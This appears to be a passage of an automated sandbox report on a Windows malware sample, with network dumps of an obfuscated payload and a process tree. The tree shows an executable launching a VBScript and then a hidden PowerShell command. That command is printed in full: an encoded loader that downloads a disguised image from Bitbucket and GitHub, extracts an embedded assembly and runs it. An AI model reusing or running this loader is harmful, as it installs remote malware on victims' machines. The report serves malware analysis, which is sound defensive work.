                                                        Accept-Ranges: bytes
                                                        Content-Type: text/plain
                                                        Server: AmazonS3
                                                        Content-Length: 626996
                                                        Connection: close
                                                        2024-10-07 07:33:23 UTC15770INData Raw: 3d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                        Data Ascii: =AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                        2024-10-07 07:33:23 UTC16384INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 45 41 41 41 41 51 51 49 69 41 43 42 69 4d 53 49 45 4d 79 49 68 51 41 4a 6b 4d 43 42 6c 55 43 4a 45 59 79 4a 6c 51 51 4b 70 67 43 42 72 73 69 4b 45 30 53 4c 73 51 77 4c 76 34 43 42 79 49 54 4d 45 51 44 4e 7a 51 67 4e 32 55 44 42 35 6b 44 4f 45 6f 6a 4f 35 51 41 50 38 73 44 42 39 30 54 50 49 63 7a 4e 32 51 77 4e 33 59 6a 63 36 6f 54 4f 6f 48 57 59 67 39 65 72 54 67 44 69 4c 75 49 38 4b 71 6f 69 77 76 34 69 4c 43 66 6a 4d 79 49 38 4f 36 59 6a 77 48 5a 6b 50 43 76 6b 53 4b 4a 38 52 4b 5a 6b 77 37 6f 6a 4e 43 2f 69 4c 71 49 38 49 69 34 68 77 58 59 68 46 43 50 68 45 4f 49 38 44 53 34 67 76
                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAQQIiACBiMSIEMyIhQAJkMCBlUCJEYyJlQQKpgCBrsiKE0SLsQwLv4CByITMEQDNzQgN2UDB5kDOEojO5QAP8sDB90TPIczN2QwN3Yjc6oTOoHWYg9erTgDiLuI8Kqoiwv4iLCfjMyI8O6YjwHZkPCvkSKJ8RKZkw7ojNC/iLqI8Ii4hwXYhFCPhEOI8DS4gv
                                                        2024-10-07 07:33:23 UTC1024INData Raw: 79 2f 6e 67 69 4a 2f 6a 53 4b 6e 38 76 4b 71 6b 79 2f 72 77 69 4b 2f 33 53 4c 73 38 2f 4c 76 34 79 2f 78 45 44 4d 2f 4c 6a 4d 78 38 50 4e 30 4d 7a 2f 32 59 54 4e 2f 6a 44 4f 33 38 76 4f 36 6b 7a 2f 37 73 6a 4f 2f 33 54 50 38 38 76 50 65 72 54 67 44 34 7a 2f 2f 41 30 50 2f 48 55 51 41 39 76 51 43 46 30 2f 43 4a 6b 51 2f 4c 30 51 43 39 76 51 43 4a 30 2f 42 46 55 51 2f 44 45 51 41 39 2f 50 2f 38 7a 2f 65 72 54 67 44 30 54 50 2f 7a 44 50 37 38 76 4f 36 6b 7a 2f 35 6b 44 4f 2f 66 7a 4e 32 38 66 4e 31 51 7a 2f 7a 4d 6a 4d 2f 48 54 4d 77 38 50 4d 77 38 79 2f 75 34 53 4c 2f 7a 53 4c 72 38 2f 4b 72 6f 79 2f 70 6b 43 4b 2f 6a 43 4b 6e 38 2f 4a 6e 59 79 2f 6d 59 53 4a 2f 58 53 4a 6b 38 50 4a 6b 49 79 2f 6a 51 69 49 2f 50 43 4a 69 38 76 49 6a 45 43 6d 70 6b 79 4a 41
                                                        Data Ascii: y/ngiJ/jSKn8vKqky/rwiK/3SLs8/Lv4y/xEDM/LjMx8PN0Mz/2YTN/jDO38vO6kz/7sjO/3TP88vPerTgD4z//A0P/HUQA9vQCF0/CJkQ/L0QC9vQCJ0/BFUQ/DEQA9/P/8z/erTgD0TP/zDP78vO6kz/5kDO/fzN28fN1Qz/zMjM/HTMw8PMw8y/u4SL/zSLr8/Kroy/pkCK/jCKn8/JnYy/mYSJ/XSJk8PJkIy/jQiI/PCJi8vIjECmpkyJA
                                                        2024-10-07 07:33:23 UTC16384INData Raw: 79 2f 6a 4d 53 49 2f 50 79 49 68 38 2f 49 6a 45 79 2f 6a 4d 53 49 2f 50 79 49 68 38 2f 49 6a 45 79 2f 6a 4d 53 49 2f 54 43 4a 69 38 66 4a 6c 4d 79 2f 6e 63 53 4a 2f 6e 53 4b 6e 38 2f 4b 72 6b 79 2f 75 30 43 4c 2f 48 54 4d 76 38 50 4e 7a 49 7a 2f 34 63 54 4e 2f 76 7a 4f 35 38 66 51 41 35 7a 2f 47 56 30 51 2f 76 30 53 4a 39 76 55 52 42 31 2f 59 68 31 56 2f 44 47 59 65 39 50 5a 6b 4a 32 2f 64 78 31 57 2f 62 56 56 55 39 2f 54 50 31 30 2f 4a 6c 30 52 2f 54 30 51 42 39 2f 50 65 72 54 67 44 30 7a 2f 36 6f 44 4f 2f 62 6a 4e 30 38 2f 4d 7a 45 7a 2f 77 41 6a 4c 2f 33 53 4c 72 38 2f 4b 72 6b 79 2f 70 67 79 4a 2f 66 79 4a 6c 38 66 4a 6c 51 79 2f 6b 51 69 49 2f 54 43 4a 69 38 50 4a 6b 49 79 2f 6b 51 69 49 2f 54 43 4a 69 38 50 4a 6b 49 79 2f 6b 51 69 49 2f 54 43 4a 69
                                                        Data Ascii: y/jMSI/PyIh8/IjEy/jMSI/PyIh8/IjEy/jMSI/TCJi8fJlMy/ncSJ/nSKn8/Krky/u0CL/HTMv8PNzIz/4cTN/vzO58fQA5z/GV0Q/v0SJ9vURB1/Yh1V/DGYe9PZkJ2/dx1W/bVVU9/TP10/Jl0R/T0QB9/PerTgD0z/6oDO/bjN08/MzEz/wAjL/3SLr8/Krky/pgyJ/fyJl8fJlQy/kQiI/TCJi8PJkIy/kQiI/TCJi8PJkIy/kQiI/TCJi
                                                        2024-10-07 07:33:23 UTC1024INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                        2024-10-07 07:33:23 UTC16384INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                        2024-10-07 07:33:23 UTC1024INData Raw: 54 67 44 39 2f 49 6a 45 79 2f 6a 4d 53 49 2f 50 79 49 68 38 2f 49 6a 45 79 2f 6a 4d 53 49 2f 50 79 49 68 38 2f 49 6a 45 79 2f 6a 4d 53 49 2f 50 79 49 68 38 2f 49 6a 45 79 2f 6a 4d 53 49 2f 50 79 49 68 38 2f 49 6a 45 79 2f 6a 4d 53 49 2f 50 79 49 68 38 2f 49 6a 45 79 2f 6a 4d 53 49 2f 50 79 49 68 38 2f 49 6a 45 79 38 6a 4d 53 49 64 4d 79 49 68 41 41 41 41 41 51 41 6a 4d 53 49 55 4f 79 49 68 30 2f 49 6a 45 79 2f 6a 4d 53 49 2f 50 79 49 68 38 2f 49 6a 45 79 2f 6a 4d 53 49 2f 50 79 49 68 38 2f 49 6a 45 79 2f 6a 4d 53 49 2f 50 79 49 68 38 2f 49 6a 45 79 2f 6a 4d 53 49 2f 50 79 49 68 38 2f 49 6a 45 79 2f 6a 4d 53 49 2f 50 79 49 68 38 2f 49 6a 45 79 2f 6a 4d 53 49 2f 50 79 49 68 38 2f 49 6a 45 79 2f 70 6b 69 4a 2f 54 65 72 54 67 44 34 6a 2f 76 39 32 66 2f 2f 32
                                                        Data Ascii: TgD9/IjEy/jMSI/PyIh8/IjEy/jMSI/PyIh8/IjEy/jMSI/PyIh8/IjEy/jMSI/PyIh8/IjEy/jMSI/PyIh8/IjEy/jMSI/PyIh8/IjEy8jMSIdMyIhAAAAAQAjMSIUOyIh0/IjEy/jMSI/PyIh8/IjEy/jMSI/PyIh8/IjEy/jMSI/PyIh8/IjEy/jMSI/PyIh8/IjEy/jMSI/PyIh8/IjEy/jMSI/PyIh8/IjEy/pkiJ/TerTgD4j/v92f//2
                                                        2024-10-07 07:33:23 UTC16384INData Raw: 66 65 72 54 67 44 2f 6e 66 65 72 54 67 44 35 2f 66 65 72 54 67 44 35 6e 2f 2f 35 6e 66 65 72 54 67 44 2f 72 66 65 72 54 67 44 35 2f 66 65 72 54 67 44 35 6e 2f 2f 35 6e 66 65 72 54 67 44 2f 6e 66 65 72 54 67 44 35 2f 76 65 72 54 67 44 36 72 2f 2f 36 72 76 65 72 54 67 44 2f 72 76 65 72 54 67 44 36 2f 2f 65 72 54 67 44 36 72 2f 2f 37 76 2f 65 72 54 67 44 2f 76 2f 65 72 54 67 44 37 2f 76 65 72 54 67 44 36 72 2f 2f 36 72 2f 65 72 54 67 44 2f 76 2f 65 72 54 67 44 37 2f 2f 65 72 54 67 44 37 72 2f 2f 37 76 2f 65 72 54 67 44 2f 7a 2f 65 72 54 67 44 37 2f 50 2f 38 7a 2f 2f 38 7a 50 2f 2f 7a 50 2f 38 2f 50 2f 38 76 2f 2f 37 76 50 2f 2f 7a 2f 65 72 54 67 44 38 2f 2f 65 72 54 67 44 37 7a 2f 2f 38 7a 50 2f 2f 7a 50 2f 38 2f 50 2f 38 33 2f 2f 38 7a 50 2f 2f 2f 33 66 65
                                                        Data Ascii: ferTgD/nferTgD5/ferTgD5n//5nferTgD/rferTgD5/ferTgD5n//5nferTgD/nferTgD5/verTgD6r//6rverTgD/rverTgD6//erTgD6r//7v/erTgD/v/erTgD7/verTgD6r//6r/erTgD/v/erTgD7//erTgD7r//7v/erTgD/z/erTgD7/P/8z//8zP//zP/8/P/8v//7vP//z/erTgD8//erTgD7z//8zP//zP/8/P/83//8zP///3fe
                                                        2024-10-07 07:33:23 UTC1024INData Raw: 2f 34 6a 50 65 72 54 67 44 2f 53 4c 74 30 2f 37 73 7a 4f 2f 66 31 55 54 39 2f 53 4c 74 30 2f 7a 4d 7a 4d 2f 50 7a 4d 33 38 2f 53 4c 74 30 2f 76 39 32 62 2f 50 31 55 54 39 2f 4a 6e 63 79 2f 54 39 30 54 2f 76 79 4b 72 38 2f 62 76 39 32 2f 2f 39 33 66 2f 50 79 49 6a 38 2f 59 6a 4e 32 2f 50 39 30 55 2f 50 30 51 44 39 2f 54 50 74 30 2f 54 4e 31 55 2f 76 31 57 62 39 2f 31 58 66 39 2f 58 76 39 31 2f 76 39 31 62 2f 2f 32 62 76 39 2f 48 6f 67 42 65 72 54 67 44 2f 4b 72 6f 79 2f 70 6b 43 4b 2f 6a 53 4b 6e 38 50 4b 6f 63 79 2f 6e 63 69 4a 2f 62 79 4a 6c 38 76 4a 6d 51 79 2f 6c 55 43 4a 2f 54 53 4a 6a 38 50 4a 6b 49 79 2f 6a 4d 53 49 2f 50 79 49 68 38 2f 49 6a 45 79 2f 6a 4d 53 49 2f 50 79 49 68 38 2f 49 6a 45 79 2f 6a 4d 53 49 2f 50 79 49 68 34 2f 49 6a 45 79 4a 6a
                                                        Data Ascii: /4jPerTgD/SLt0/7szO/f1UT9/SLt0/zMzM/PzM38/SLt0/v92b/P1UT9/Jncy/T90T/vyKr8/bv92//93f/PyIj8/YjN2/P90U/P0QD9/TPt0/TN1U/v1Wb9/1Xf9/Xv91/v91b//2bv9/HogBerTgD/Kroy/pkCK/jSKn8PKocy/nciJ/byJl8vJmQy/lUCJ/TSJj8PJkIy/jMSI/PyIh8/IjEy/jMSI/PyIh8/IjEy/jMSI/PyIh4/IjEyJj
                                                        2024-10-07 07:33:23 UTC16384INData Raw: 65 72 54 67 44 2f 6d 62 75 35 2f 4c 75 34 68 2f 50 36 6f 6a 65 72 54 67 44 2f 6d 62 75 35 2f 76 65 72 54 67 44 36 72 2f 2f 36 72 76 65 72 54 67 44 2f 68 48 65 34 2f 66 65 72 54 67 44 35 6e 2f 66 35 6c 58 65 72 54 67 44 2f 6a 50 75 34 2f 54 4f 35 6b 2f 2f 36 72 76 65 72 54 67 44 2f 6d 62 75 35 2f 7a 4f 37 72 2f 66 36 71 6e 65 72 54 67 44 2f 6b 54 4f 35 2f 76 65 72 54 67 44 36 72 2f 66 34 68 48 65 72 54 67 44 2f 73 7a 4f 37 2f 4c 75 34 69 2f 50 36 6f 6a 65 72 54 67 44 2f 72 76 65 72 54 67 44 36 2f 62 65 72 54 67 44 35 6e 2f 50 37 73 7a 65 72 54 67 44 2f 73 7a 65 37 2f 6a 65 36 70 2f 66 37 74 33 65 72 54 67 44 2f 73 33 4f 37 2f 33 65 37 74 2f 2f 37 77 44 2f 2f 74 33 65 37 2f 6e 65 36 70 2f 50 38 77 44 2f 2f 31 58 66 39 2f 58 76 39 32 2f 66 39 31 58 2f 2f 32
                                                        Data Ascii: erTgD/mbu5/Lu4h/P6ojerTgD/mbu5/verTgD6r//6rverTgD/hHe4/ferTgD5n/f5lXerTgD/jPu4/TO5k//6rverTgD/mbu5/zO7r/f6qnerTgD/kTO5/verTgD6r/f4hHerTgD/szO7/Lu4i/P6ojerTgD/rverTgD6/berTgD5n/P7szerTgD/sze7/je6p/f7t3erTgD/s3O7/3e7t//7wD//t3e7/ne6p/P8wD//1Xf9/Xv92/f91X//2


                                                        Statistics

                                                        CPU Usage

                                                        Click to jump to process

                                                        Memory Usage

                                                        Click to jump to process

                                                        High Level Behavior Distribution

                                                        Click to dive into process behavior distribution

                                                        Behavior

                                                        Click to jump to process

                                                        System Behavior

                                                        General

                                                        Target ID:0
                                                        Start time:03:33:11
                                                        Start date:07/10/2024
                                                        Path:C:\Users\user\Desktop\OTO2wVGgkl.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Users\user\Desktop\OTO2wVGgkl.exe"
                                                        Imagebase:0x7ff6975a0000
                                                        File size:164'352 bytes
                                                        MD5 hash:63AF3844E6D0A5FA89DA17713CE1FB59
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:low
                                                        Has exited:true

                                                        General

                                                        Target ID:2
                                                        Start time:03:33:11
                                                        Start date:07/10/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd.exe /c 123.vbs
                                                        Imagebase:0x7ff7f0930000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:3
                                                        Start time:03:33:12
                                                        Start date:07/10/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff66e660000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:5
                                                        Start time:03:33:12
                                                        Start date:07/10/2024
                                                        Path:C:\Windows\System32\wscript.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\123.vbs"
                                                        Imagebase:0x7ff6e7ad0000
                                                        File size:170'496 bytes
                                                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:6
                                                        Start time:03:33:12
                                                        Start date:07/10/2024
                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#Gc#Z#Bm#GY#ZgBm#GY#ZgBm#GY#LwBk#GQ#Z#Bk#GQ#LwBk#G8#dwBu#Gw#bwBh#GQ#cw#v#Gk#bQBn#F8#d#Bl#HM#d##u#Go#c#Bn#D8#MQ#x#Dg#MQ#x#Dc#Mw#1#Cc#L##g#Cc#a#B0#HQ#c#Bz#Do#Lw#v#HI#YQB3#C4#ZwBp#HQ#a#B1#GI#dQBz#GU#cgBj#G8#bgB0#GU#bgB0#C4#YwBv#G0#LwBz#GE#bgB0#G8#bQBh#Gw#bw#v#GE#dQBk#Gk#d##v#G0#YQBp#G4#LwBp#G0#ZwBf#HQ#ZQBz#HQ#LgBq#H##Zw#/#DE#N##0#DQ#MQ#3#DI#Mw#n#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#I##9#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I##k#Gw#aQBu#Gs#cw#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#Gk#Zg#g#Cg#J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##LQBu#GU#I##k#G4#dQBs#Gw#KQ#g#Hs#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBU#GU#e#B0#C4#RQBu#GM#bwBk#Gk#bgBn#F0#Og#6#FU#V#BG#Dg#LgBH#GU#d#BT#HQ#cgBp#G4#Zw#o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#HQ#YQBy#HQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#FM#V#BB#FI#V##+#D4#Jw#7#C##J#Bl#G4#Z#BG#Gw#YQBn#C##PQ#g#Cc#P##8#EI#QQBT#EU#Ng#0#F8#RQBO#EQ#Pg#+#Cc#Ow#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#KQ#7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#ZQBu#GQ#SQBu#GQ#ZQB4#C##PQ#g#CQ#aQBt#GE#ZwBl#FQ#ZQB4#HQ#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bl#G4#Z#BG#Gw#YQBn#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#C0#ZwBl#C##M##g#C0#YQBu#GQ#I##k#GU#bgBk#Ek#bgBk#GU#e##g#C0#ZwB0#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#Ck#I#B7#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#C##Kw#9#C##J#Bz#HQ#YQBy#HQ#RgBs#GE#Zw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bi#GE#cwBl#DY#N#BM#GU#bgBn#HQ#a##g#D0#I##k#GU#bgBk#Ek#bgBk#GU#e##g#C0#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I##k#GI#YQBz#GU#Ng#0#EM#bwBt#G0#YQBu#GQ#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#FM#dQBi#HM#d#By#Gk#bgBn#Cg#J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#Cw#I##k#GI#YQBz#GU#Ng#0#Ew#ZQBu#Gc#d#Bo#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I##k#GM#bwBt#G0#YQBu#GQ#QgB5#HQ#ZQBz#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBD#G8#bgB2#GU#cgB0#F0#Og#6#EY#cgBv#G0#QgBh#HM#ZQ#2#DQ#UwB0#HI#aQBu#Gc#K##k#GI#YQBz#GU#Ng#0#EM#bwBt#G0#YQBu#GQ#KQ#7#C##J#Bs#G8#YQBk#GU#Z#BB#HM#cwBl#G0#YgBs#Hk#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#FI#ZQBm#Gw#ZQBj#HQ#aQBv#G4#LgBB#HM#cwBl#G0#YgBs#Hk#XQ#6#Do#T#Bv#GE#Z##o#CQ#YwBv#G0#bQBh#G4#Z#BC#Hk#d#Bl#HM#KQ#7#C##J#B0#Hk#c#Bl#C##PQ#g#CQ#b#Bv#GE#Z#Bl#GQ#QQBz#HM#ZQBt#GI#b#B5#C4#RwBl#HQ#V#B5#H##ZQ#o#Cc#d#Bl#HM#d#Bw#G8#dwBl#HI#cwBo#GU#b#Bs#C4#S#Bv#G0#ZQ#n#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bt#GU#d#Bo#G8#Z##g#D0#I##k#HQ#eQBw#GU#LgBH#GU#d#BN#GU#d#Bo#G8#Z##o#Cc#b#Bh#Cc#KQ#u#Ek#bgB2#G8#awBl#Cg#J#Bu#HU#b#Bs#Cw#I#Bb#G8#YgBq#GU#YwB0#Fs#XQBd#C##K##n#HQ#e#B0#C4#Ng#w#G8#c##v#HM#Z#Bh#G8#b#Bu#Hc#bwBk#C8#dwBx#HQ#cgBl#HQ#cgBl#C8#awBy#HU#cgBl#G0#b#B1#HI#LwBn#HI#bw#u#HQ#ZQBr#GM#dQBi#HQ#aQBi#C8#Lw#6#HM#c#B0#HQ#a##n#Cw#I##n#D##Jw#s#C##JwBT#HQ#YQBy#HQ#dQBw#E4#YQBt#GU#Jw#s#C##JwBS#GU#ZwBB#HM#bQ#n#Cw#I##n#D##Jw#p#Ck#fQB9##==';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('#','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec
                                                        Imagebase:0x7ff6e3d50000
                                                        File size:452'608 bytes
                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:7
                                                        Start time:03:33:12
                                                        Start date:07/10/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff66e660000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:8
                                                        Start time:03:33:14
                                                        Start date:07/10/2024
                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):false
